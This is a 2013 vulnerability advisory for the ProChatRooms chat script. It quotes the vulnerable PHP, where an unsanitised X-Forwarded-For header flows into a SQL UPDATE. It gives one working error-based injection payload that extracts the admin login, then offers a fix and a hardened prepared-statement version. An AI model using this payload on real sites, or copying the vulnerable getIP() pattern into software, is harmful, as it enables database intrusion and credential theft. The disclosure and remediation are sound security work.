ProChatRooms <=~ 7 SQL injection

# Exploit Title: ProChatRooms <=~ 7 SQL injection
# Date: 01/02/2013
# Exploit Author: Kallimero
# Vendor Homepage: http://prochatrooms.com/
# Version: 7.0 and the latest version (but I can't write a nice PoC without the code)
# Tested on: Debian


Introduction
============

Prochatrooms is a simple chat script that costs around $50.
But price doesn't mean security.


Vulnz
========

There are some XSS and CSRF issues, but most of them have already been reported. So here I'm going to focus on an SQL injection.


---------------[functions.php]---------------
<?php
function updateUser()
{
        // update details
        // Session values go through makeSafe(), but the return value of
        // getIP() is concatenated into the query as-is.
        $sql = "UPDATE prochatrooms_users
                        SET username = '".makeSafe($_SESSION['username'])."', userIP = '".getIP()."', room = '".makeSafe($_SESSION['room'])."', active = '".getTime()."', online = '1', streamID = '".$_SESSION['myStreamID']."'
                        WHERE username = '".makeSafe($_SESSION['username'])."'";

        mysql_query($sql)
        or die(mysql_error());
}
?>
---------------[functions.php]---------------

It looks safe enough, except for getIP(), whose return value never passes through makeSafe(). A short look at getIP() confirms that:

---------------[functions.php]---------------
<?php
function getIP()
{
        // Client-supplied header, used verbatim when present
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];

        // Only falls back to the real TCP peer address when the header is empty
        if ($ip == '')
        {
                $ip = $_SERVER['REMOTE_ADDR'];
        }

        return $ip;
}
?>
---------------[functions.php]---------------

The injection point is $_SERVER['HTTP_X_FORWARDED_FOR'], i.e. the X-Forwarded-For request header (the ModifyHeaders Firefox add-on is a convenient way to set it).


The PoC is error-based and works on version 7.
On the latest version (the demo on their website) the vuln is present, but my PoC doesn't work.

Have fun:
X-Forwarded-For=' and (select 1 from (select count(*),concat((SELECT adminLogin FROM prochatrooms_config LIMIT 0,1),0x7e, floor(rand(0)*3)) as e from information_schema.tables group by e) a)-- -


How to Fix ?
============

Just replace the getIP() function with this one:
<?php
function getIP()
{
        // Use the address of the TCP peer only; ignore client-supplied headers
        return $_SERVER['REMOTE_ADDR'];
}
?>
X-Forwarded-For is not really useful unless your reverse proxy sets it to the real user IP.
If you don't have a reverse proxy, you're going to have a bad time (IP spoofing or, as here, SQL injection).
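For sites that do sit behind a reverse proxy, here is a hardened version of both functions, added as an example and not part of ProChatRooms or the original advisory. X-Forwarded-For is consulted only when REMOTE_ADDR is one of your own proxies (the $TRUSTED_PROXIES list and its address are assumptions), the chosen value must pass FILTER_VALIDATE_IP, and the UPDATE runs as a mysqli prepared statement so no header or session value can reach the SQL text; it assumes a mysqli connection $db and the script's own getTime().

```php
<?php
// Added example, not ProChatRooms code. Assumes mysqli ($db) and the script's getTime().
$TRUSTED_PROXIES = array('10.0.0.5'); // constructed: addresses of your own reverse proxies

function getIP()
{
    global $TRUSTED_PROXIES;
    $peer = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '';
    // No trusted proxy in front of us: the TCP peer is the client and
    // X-Forwarded-For is attacker-controlled, so it is never read.
    if (!in_array($peer, $TRUSTED_PROXIES, true)) {
        return $peer;
    }

    // Behind a trusted proxy the header reads "client, proxy1, proxy2".
    // Walk from the right, skipping our own hops; the first other address
    // was appended by a proxy we trust.
    $xff  = isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : '';
    $hops = array_map('trim', explode(',', $xff));
    for ($i = count($hops) - 1; $i >= 0; $i--) {
        if (in_array($hops[$i], $TRUSTED_PROXIES, true)) {
            continue;
        }
        // Accept only a syntactically valid IPv4/IPv6 address; anything else
        // (such as the quote-prefixed payload above) falls back to $peer.
        if (filter_var($hops[$i], FILTER_VALIDATE_IP) !== false) {
            return $hops[$i];
        }
        break;
    }
    return $peer;
}

function updateUser(mysqli $db)
{
    // Prepared statement: parameters travel separately from the SQL text,
    // so no header or session value can alter the query structure.
    $stmt = $db->prepare(
        "UPDATE prochatrooms_users
            SET userIP = ?, room = ?, active = ?, online = '1', streamID = ?
          WHERE username = ?"
    );
    if ($stmt === false) {
        die($db->error);
    }
    $ip = getIP(); $time = getTime();
    $stmt->bind_param('sssss', $ip, $_SESSION['room'], $time,
                      $_SESSION['myStreamID'], $_SESSION['username']);
    $stmt->execute() or die($stmt->error);
    $stmt->close();
}
```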



Thanks
=========

All hwc members: Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0, gr4ph0s.
Please visit: http://orgasm.re/

Groucho

